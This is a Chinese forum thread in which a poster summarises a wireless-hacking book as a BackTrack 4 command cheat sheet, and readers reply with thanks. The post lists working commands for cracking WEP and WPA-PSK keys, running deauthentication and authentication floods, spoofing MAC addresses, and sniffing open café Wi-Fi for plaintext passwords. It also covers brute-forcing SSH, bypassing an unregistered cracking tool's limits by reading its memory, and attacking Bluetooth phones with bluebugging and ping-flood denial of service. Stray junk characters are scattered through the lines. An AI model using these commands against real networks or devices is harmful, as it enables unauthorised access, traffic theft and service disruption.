搜索
格西欧解决方案
如意云路由器
查看: 8678|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3711

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
$ }5 J$ d$ ?2 m6 n  g/ ?% _
" ]& Y7 J& O& ~" ?2 [以下所有操作均在BackTrack 4中进行。7 N/ I$ ^6 z4 V" w
% s* A1 y/ ^' H0 O( j3 a

, o  N& s( |/ }! ?( d  Q5 u% ]无线WEP加密P解:4 |9 f# H7 s( z3 U) G8 w

8 U3 b- F+ z, J注入P解:6 I! w% L; v/ Y$ v+ N# O% ^5 R2 G
) n" R% }7 R$ `. ~- a! h5 F4 f6 g* `, q
ifconfig, Z8 D% j$ f* _* a* \5 T
: i% q: N. p' M1 |1 Z* e# u& V: P
ifconfig –a
8 W' Z/ n9 J+ Q9 _6 M$ G2 `' a5 ^9 t1 w4 m1 p; p. v$ f
ifconfig wlan0(无线网卡) up( p3 z; c9 P! w, l) w, y
0 K8 n+ f1 i. R$ f" L- P
airmon-ng start wlan0% h/ t  X6 ^  [$ V5 x
9 O* w1 T: w0 z6 G) {' e1 U) s3 M
airodump-ng mon0
& G. l8 j! Q  f: G0 b! L) Y: M- V% z6 s
airodump-ng --ivs –w ivsfile –c 频道 mon0或! M- @) y( \- G, F! {' y
0 H  ?3 S% f4 B2 N2 J
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon07 D# x6 @; S6 ?( [9 J! z

* ^9 g% Q6 R3 j# }, c: }# uaireplay-ng -3 –b BSSID –h Station mon0/ C/ Y; N- c8 x
% @- l' X3 |6 w. T
aircrack-ng ivsfile-01.ivs5 ^/ x5 ]# O+ o! d3 g  E% b
2 g1 c; \6 b/ e8 Q& F1 r
虚连接P解(适用于无客户端连接APP解)
1 o) O/ P, C  v3 l, f7 D0 r+ O0 [% I1 e/ [$ V, O' A
ifconfig( O4 c- A6 j5 v+ ~% `; L
8 [( `+ r* L  T$ [! a9 O
ifconfig –a: O9 t: x% a3 @
* n0 U* k& Z, T  E; [; J. c+ G5 O
ifconfig wlan0(无线网卡) up
; u5 A7 l/ V. M3 ~/ D% z' G8 O' t" \! }: Y3 R
airmon-ng start wlan0
/ E1 D, Q6 o3 w' ]6 o& U2 a0 j
% o7 ]! r5 ~) V4 B( a6 M: C( mairodump-ng mon01 G5 T0 A- o: n8 b: f9 S8 v2 O6 Y$ ~
7 z3 c" @1 ?2 q0 E
airodump-ng --ivs –w ivsfile –c 频道 mon0或
2 I& o) l' K7 f7 K0 \( v; p1 M( Z4 u5 p4 w! i$ h' n3 K
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0' Y( }/ u1 a! R0 r" Q( X6 p- j* L
  e7 N; c& X. [2 Q  G- w: s
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
7 n- m8 P. S. Q5 W0 k! ~0 E
9 t- u$ C! H0 J) J+ ~! |* r6 p7 V3 Vaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
- B+ T1 y( a' Q" S% Q% F% N1 W
: q* ]+ a& {* _7 ?aircrack-ng ivsfile-01.ivs% z0 X8 @! T: K- s/ [5 C
# a) j9 J+ {& \7 z
! u* Z: x0 Q! V& y2 f
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
- f1 R* f, L# O7 v4 x1 i
3 k7 _2 m) N! Y1 G& Q: |" E/ u3 b4 K( f
WPA-PSKP解' q5 v1 {: l& [4 R: x  Z
1 S4 E( a/ O  P" y! j/ t, P
ifconfig+ P6 N; w/ |. {, B
6 \: v  l' {* I
ifconfig –a
# A. i$ `+ T( Z8 M+ w. ]3 n
) v* m* }/ c: b& S" O9 g# Nifconfig wlan0(无线网卡) up
. W4 A) o- G: Q; Q/ C* S8 D: _& b/ h- g( P0 J/ a. x
airmon-ng start wlan0
- J' V$ Z# z6 X5 _
/ Y4 I, |9 C, rairodump-ng mon0! t( S( G4 |5 v' _4 q

* }* a( O9 Z  h) v8 x6 r0 iairodump-ng –w capfile –c 频道 mon0
( }6 h& y3 A4 N1 e* y
5 B5 T% w) H4 y* O) |' V1 r( c& |aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
$ s* T# L. b+ r- ^# O6 c  n( I- L; `( a" b" E
aircrack-ng –w Dic capfile-01.cap或
7 I2 t: _' \* S. Y/ k2 {
+ }, o: W+ p( W' j) Ecowpatty –f Dic –r capfile-01.cap –s SSID) }- m/ `5 ~  o, D, K6 @

0 @, @& p, A+ v3 c! v  N. ccowpatty –d HashTable.Hash –r capfile-01.cap –s SSID. R) R1 ?* R: d. \% H  W
9 ~- E' t: v+ l! p& l* ^& o
傻瓜式P解软件SpoonWPA。
$ u+ R: K- T& a; H
: h4 N) ]% k. Y, R5 S3 p) OBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst
' z  j$ H# o- U1 Y# }2 }
% [# y7 |' _# U& O8 J& W; x/ J  E' a" h% o2 j! X3 e0 m
字典文件的生成和上传* Z( V' }5 u% ^, Q. p* T
* a- F7 ~" c8 E( o7 s+ \6 V7 J% x. {
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
/ U- n9 j0 }  y+ d, f. ]; s. S
3 x) K3 s! ]" I* V9 O4 S: V. Q6 s1 i: X
8 x, u8 y3 J  I* ]BT4下开启Tftp:Services—TFTPD—start TFTPD6 h# T/ H$ R; O2 E0 f: \

1 o& v+ O' O0 }) i在Windows的CMD中运行 tftp –i IP put **.dic
& Z4 f% N# ?" y+ T6 J2 [) }* @& a( d, T3 {

: a# S0 `9 F$ D4 aBT4下开启SSH:Services—SSH—start SSH: v& r3 y% A& x3 H" p" F1 [' K

, `, D4 G& }; M+ `' nWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
! f  H+ a( X" J6 z4 g) K  E- i+ m) u* m" m2 _
5 ~8 g8 t4 X$ s  O
AP限制MAC时的解决
2 B! K; e' p8 y* w+ F& A; }: h+ \
; S. k* R3 h. `" |/ T5 `& h! A当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:1 q2 j$ K5 k+ V3 j9 j3 s

2 D! ^6 @6 u% c: ]- k! `ifconfig wlan0 hw ether NewMAC
4 Q4 H( x3 S( @5 V( P! J& E
( D$ ]0 p9 \; T3 I7 C( q
: b# n6 G. }2 A) X* p7 ^6 T# t0 f关闭SSID广播的AP探测:
" c: j& b8 Q2 y/ M  |8 s0 I8 n# J+ L0 S
1.     Deauth攻击:5 q) @& S) {: I# R
2 O6 [* e2 o" v3 b) }
airodump-ng mon0
4 F2 |* [" F+ d
# ^$ Z3 k+ f1 F1 y8 ~/ q8 @) Raireplay-ng -0 10 –a BSSID –h Station mon0
: x0 q+ G+ Z" h6 _6 ~
$ V4 @! s* R' C8 }2.     抓包分析
6 Z0 L, R9 A' K( s/ [2 q
; v" o. Q) N5 X. d4 `/ @Omnipeek9 @+ j& b  [) _$ ], E
' D, y: A4 ?9 ?: p
Tcpdump –n –e –vvv –i 网卡名
! i2 v2 `. ^# e5 s" t! k; b; ]" O6 F
) {/ O& Q/ P4 p/ T5 h3.     暴力P解; T# T' Q/ m" K4 m# h  D( B
: m. J* s. I+ Z  L
Charon 1.1暴力P解6 O5 z1 B7 N) A2 r5 `$ C9 `

1 R, N$ P- \/ z' l7 `: p
& V* A9 R% ], k8 v. a无线加密数据包的解密* ~1 g) S/ D/ H- a

' ]; R( y* o! D; K4 ^' X- r3 N  e  }
) j; [% m! s' m* ~6 i使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。) Q1 D! Q/ }9 n+ _

1 e! v6 |1 E( }. D% h  [FilterNS     DNS解析数据包* m; e% v+ e) d
2 S% i7 v" I) H- z
Filter:HTTP    WEB访问数据包, [3 K$ D8 q( g$ l

8 a! ^- d2 k3 Y* b" {Filter:msnms   MSN
. q8 R1 t& b: W- d! s
5 X; y1 t# y& @9 s* \7 O0 r* r# VCtrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。* X/ Z$ U) M& \; p

: @/ W3 {. Y. H使用airdecap-ng解密:
0 r' c( t# v( \' M2 v  j0 Y9 h+ l9 i4 Y3 t3 p
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap- v$ V  V* s( n4 H  y5 _/ Z

( m, S9 B% G9 b( O9 m( ~& D4 X
/ h$ Q5 ^+ B, O4 W7 |: C6 c) k/ g7 r咖啡馆中无线数据截取(开放式无加密AP)1 z& H% J9 w6 J) z+ F: F7 r
, Q) a: e0 v6 `
1.Airodump-ng –w data –c频道 mon0$ Z. P  d+ I/ S* E- g$ O* K: }. F

/ b* E  c# J# p" O( l( r0 J; X2.使用WireShark打开分析/ ]) O8 k5 y4 W' ]
+ p* u& Z0 E$ d9 ]5 p

! b; t9 z% r% k! uBT4下的渗透工具:  B2 O7 H! o8 `' M9 R# k

. f3 H7 n9 e2 \1 U& A( y  Ynmap –sP IP/24        判断C段下存活的主机 2 _1 u$ J4 y) E* \7 }: j8 h
2 b# a' G( k- I0 f- E$ |8 V2 Y+ w
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放* ?3 N5 k1 F( j$ f# {$ u8 D) [
% X! F  g4 M7 f
nmap –vv –sV IP –p port   指定端口的详细信息。。。, X8 [' j. z5 b- m

" f( a8 P" b5 v* Pnamp –O IP/24    判断主机的系统版本9 X+ v$ q) x7 V
1 v* e) {/ Z$ q) |' s

. s7 o  t2 H' s  Y$ M" hGUI 版nmap:Zenmap
& \  c! ]! j, A4 V: h
" u" `- P9 e& u" G1 O- V; g- }0 y! y: a$ ~
Amap使用:amap –B IP port% C3 Y2 U7 M' _

0 ?, I8 }; b6 R) x: `0 P6 dNbtscan(扫描Windows网络NetBios信息):5 R6 n3 O5 \2 ]' t
( g9 X/ S- P  V+ y; C% Z, u
nbtscan –v –s : IP/24! E& O5 W5 U! i. S' @8 f3 F. l

6 _0 i8 h# P# d/ Y9 enbtscan –r IP
5 n8 e. p9 k2 U$ N+ U2 z- M. [9 N; r, K# J) b9 j% A" v

) }  Q3 \5 f4 y9 P# e7 |  LDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.3 e$ j5 y; a1 Z
0 {( T) n& I/ l8 x  W9 W

& _; }1 W/ f6 d, y4 L/ YHydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)# V) H5 m) f/ w2 Q

; n+ N& [. V! YBruteSSH: ./bruthe.py –h IP –u Username –d Dic7 Y; s" @4 U3 s7 x6 i: o  [$ o

2 G0 u5 M4 S/ n. b, tMetasploit3使用" E" e# Y) E! t9 G1 }5 T, q+ ~
无线D.0.S7 M7 E, o6 t6 F+ P4 {+ X/ ]* R
  N. X2 z' L) D; i+ ]

' _* B6 e1 R, j2 k& V2 cAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)2 y0 j8 ]0 q+ J8 Q6 p* r1 p3 P

0 j5 ~+ d% o7 vairmon-ng start wlan0& o( y# r8 g/ V& Y# k

0 j% \1 A: \3 t2 \$ ]: sairodump-ng mon04 _( f# v: [1 u/ v) U

7 r9 W, y, ]- Kmdk3 mon0 a –a BSSID
. c& e4 H4 B! l1 Q, P3 f0 h9 E% J  f+ I3 A: ~4 Q( y& B
对所有的AP攻击:mdk3 mon0 a
, b, W3 M5 u( M' m0 t9 r- k$ `/ f5 A
& d: }6 Z- V6 e) D) E, L
Deauth Flood 攻击' z" C* G- V7 Y; D0 |5 ^
3 ?& J9 O; X6 w8 _' J4 [) }4 A& v
mdk3 mon0 d –c Channel
) G% b, ]( A7 ^" s6 e4 f6 f
9 o2 A( y* V, F# N图形化D.O.S攻击:Charon
3 W' S- j6 i' L' {3 ]$ `6 k0 t
2 V8 l& d- G& q1 D7 t% r
4 ^- P+ m. ?  j1 Q- z6 v当受到攻击时,使用Wireshark抓包可以看到异常信息。* |/ K3 a1 {6 m5 U
8 W8 G& u' d# F; l
# l; P" V5 j1 _& O, G+ H
WPA-PSK高速P解
0 ?) I: I- w5 q8 V0 O0 f8 f# ^
8 l6 Q+ d7 m; E. c1.       WPA-PSK PMK Hash TablesP解
  Q& \9 y9 O0 }1 T/ @
3 \2 c$ A5 o2 pCowpatty –d HashTable.hash –r ***.cap –s SSID- P1 I7 B" v. E

7 @- X" L, l7 x: |- VHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID- y6 w8 n+ _( N5 \

+ j. J3 ?" S6 H2.       GPU辅助高速P解# r4 [$ g0 G1 S! _$ A
  ?- j- M, _+ |% S5 p( r$ Q0 `5 P
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
7 e0 C( H8 e% ]4 X4 U
/ j/ i6 e& r; b  z. f! l4 G& W% E3.       分布式P解
7 B2 J! s( y" i6 @1 V' E1 t8 x
% t7 D* M4 c2 p6 X- Z
8 h2 L$ Y) M. w( f4 Y0 rAP的伪造
+ M( n2 h) e3 H/ \  t: @  k
3 f9 w  Q7 l( i9 |3 Y把AP的MAC改成目标AP的MAC
5 w) e' I' W8 ]) p' @& O: q6 G  F% w  V
0 E* p3 A7 Z9 g网卡软AP, Y7 _( U& U) u3 l3 b" S
( k) ?9 @1 [" `' Y& [8 B

% I  F/ f( ~8 v* z1 K伪造大量虚假AP信号:
- K3 I* s8 |3 x" G9 w
0 ^) B# _; w5 W% H' @随机SSID:mdk3 mon0 b –g –c 频道 ; J, V8 z8 v0 a2 z' ]# h

: s4 R$ R# f9 ~1 X/ U0 H" S指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度6 o3 K4 K& D: S" A. W" ^' [
1 ]: ^- [, M# i9 {% s

, Y2 i5 l* ^5 E7 j* iWar-Driving0 O5 G0 |4 D" K- {" A
. V$ u" n) ?: h# w; T
热点地图绘制
; Y& [9 h! F1 I# V  }) ?. a; d( t: Z4 `7 D* V8 O' H
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
( \0 \  l2 I" {" L8 ^5 F
$ a$ A, v9 I9 d& Y3 p" y6 s
5 i( d7 ~: j3 Z3 O4 sNetstumble: W& N+ \' }5 p

: Q2 k0 N# o  X8 S# U8 I6 C& c. A- }: Z, l. C
蓝牙Hacking1 Q7 E. [2 b1 y5 F5 i0 X

% I3 S8 E5 E; I" _" U5 ZWindows下的Blue Soleil工具. Y# W* X: R5 Z7 ]
/ {; q( d8 K9 b9 v2 b! P6 [
BT4:' n. }# J( e! b3 ]" O. P4 T
( j( ~) a& ?2 `* H
hciconfig 查看蓝牙适配器
1 n9 B" X- I9 t% E) Q- n
8 G+ O1 g8 u4 Q9 J. \! @: {hciconfig hci0 up 载入蓝牙适配器
4 n. B3 E* b$ a9 O* Y' C' P( G, b5 z! Y) E. A
hciconfig hci0 class 蓝牙适配器详细信息2 l: i+ F) V; Y: z6 o

) d' R0 j3 E& }, q
$ L3 K( I8 e7 \/ [7 H1 zhcitool(扫描蓝牙)$ o7 F  t3 A5 t+ R' S2 Z. X- Y
1 a: @2 `6 D. l: ]
hcitool –i hci0 scan
& I, i+ y; d" j9 X( y
& B7 ]1 F- l8 [& c# XBTscanner(扫描蓝牙)+ y8 b8 A$ ]* j3 u( v5 c
! z! Q4 x$ Z5 s9 w3 J1 S# R
1 ?! K$ Q! |' [$ \% A0 g
蓝牙攻击:/ C' K/ T) ^1 O% y  I2 |
2 Y. Z& N7 w  Z( R$ t; s
BlueBugging (适用于BlueTooth V1.1的手机)
! Q) m8 |# L. @0 D& u2 I' @2 j$ {* |3 ^2 u5 {
Bluebugger工具:
; S8 u( m* `; L5 f  }9 a
: \! A# ~5 o, ^1 ?# f5 R* BBulebugger –a HD_Addr info% l9 x. b- z6 h5 m8 L/ q7 t% ]
9 J& S4 s5 R# `' j4 o

% m( f  q; W& `2 U  a& kBlueJacking9 C' h" {+ P& q& m8 F# x
5 n) x. \: N+ n1 u0 @  G
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
; P4 C  z7 J* B' a0 h! o5 Y% F, O! G, P

/ K" V" T8 c" r8 d$ t+ q4 lHD_Addr修改:
- Y  u7 y- Y4 i! q2 f4 C" n% d) F1 @6 l% {8 A# F2 }& K
Bdaddr工具1 r3 X) a6 o0 m7 L1 q7 Z

% k+ _# u) E0 Dbdaddr –i 蓝牙设备名 新HD_addr! G7 {) ?! h% u3 y7 l8 k

2 n% ?3 X3 T: {; `% q
9 L) o3 h/ ?! x蓝牙D.O.S1 F3 G% ^* V: E2 S" f
0 ]7 M6 G7 S- U6 T2 d8 U+ ~7 ~8 K
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务3 d5 b& {1 P7 M1 }; @' Z9 s

' q* A" a  s6 [& _2 Chciconfig3 P/ Z5 v# N$ F/ h) Z2 v: u  c- u  q
+ R4 ~. R. e6 C+ u
hciconfig hci0 up
% I7 c: r8 `6 M) E" C6 i
* U$ Y% Q. p+ x; t1 y" chcitool –i hci0 scan
0 r- K" W+ M; {3 b& ~) f* J4 L# p' {: k# N# q* ~
l2ping –s 10000 –目标MAC/ b$ ]9 T& i1 z7 M+ g
6 X# ^  \. x+ R4 n$ @# X  w
* z& @5 W  V' t# X! }/ {: S
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)+ X3 \: @- y) N" c' c0 \6 k
) F1 |5 u8 O6 x0 |3 ~" _
./fang –r ************-############ -s! C! _; B0 Q6 a, V8 U

. J' O; J, J# f  Y暴力P解************-############的蓝牙设备
( P# f* c  V5 h; u3 l/ N0 w9 h% k. b9 x: H  [' |
./fang –l 各厂商BD_Addr分配* @9 A9 I; N; D& N; _: V3 }
& K- e! a8 w+ R

# b- `6 v* N5 s& G+ HWifiZoo使用
2 P) t$ e% n3 W% \- N3 b( K  m6 E0 S( O5 V" e! {
./wifizoo.py –c Capfile
! u- G4 p2 H8 e! ]( Y6 m$ n9 H" `0 ?- A* n8 _- V
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1128

积分

上尉

该用户从未签到

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

251

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

680

积分

中尉

该用户从未签到

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。2 h6 \3 A, C9 b( o
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
: f1 C2 F+ |3 [呵呵 其实也不贵 21块 快递再一点
6 V8 f7 e8 I- S9 }" x* B. K3 p3 E0 |我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

关闭

从旁人的错误中可以学到聪明 上一条 /1 下一条

手机版| Archiver| 无线门户 ( 粤ICP备11076993 )      小黑屋 | 免责声明

GMT+8, 2014-9-2 09:47 , Processed in 0.291391 second(s), 17 queries , Gzip On ,Memcache On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表